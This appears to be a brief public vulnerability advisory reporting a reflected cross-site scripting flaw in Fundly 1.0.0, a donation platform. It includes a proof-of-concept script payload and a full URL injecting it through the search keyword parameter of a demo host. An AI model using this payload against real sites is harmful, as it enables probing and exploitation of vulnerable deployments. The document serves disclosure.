Fundly version 1.0.0 suffers from a cross site scripting vulnerability.
0a01bb2c9a2d1fadf76ab85600d1d06ec2398b15378af4b137d16d293ad51c6a
============================================================================================================================
| # Title : Fundly 1.0.0 XSS Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : 1.0.0 |
| # Vendor : https://codecanyon.net/item/fundly-a-donation-platform/21225201?s_rank=4 |
| # Dork : n/a |
============================================================================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] in Search box use payload : <script>alert(/indoushka/);</script>
http://fundly.techvill.net/search?keyword=1%3C/title%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================